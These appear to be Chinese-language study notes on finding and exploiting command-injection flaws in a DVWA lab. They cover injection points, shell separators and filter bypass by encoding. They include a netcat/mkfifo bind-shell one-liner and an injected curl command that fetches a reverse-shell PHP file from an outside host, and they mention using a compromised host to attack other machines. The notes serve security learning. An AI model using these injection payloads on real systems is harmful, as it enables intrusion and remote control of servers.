3 漏洞挖掘原则,命令执行
·所有变量 参看删除变量时 返回异常的变量 如果提交的符号有过滤 可以通过编码绕过
·所有头
·Cookie中的变量
·逐个变量删除
漏洞的本质
数据与命令混淆了 服务器端对数据过滤不严格
漏洞挖掘
·命令
应用程序开发者直接调用操作系统功能
使用操作系统的命令 看一下返回结果 是否与操作系统返回的一样吗
操作系统命令执行可以用;来一次执行
通过猜测服务器端的代码
与写代码一样 所以这就是一个思路(ping的小知识 windows值ping3个包 linux一直ping 所以-c 3 ping3个包)
&&也可以 不过当涉及到符号时 可能会编码绕过
&是并行的命令
| 加命令也可以 || 也是一样的(前面失败再执行后面的命令)
查看源码 过滤用户输入
问题 绕过是否为数字
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
在kali中写一反弹php 然后让dvwa执行这个指令
但是这个反弹shell的在哪里执行 反弹的是哪个服务器的shell
那么这个作用就是 使用肉鸡去攻击其它机器
;curl http://1.1.1.1/反弹.php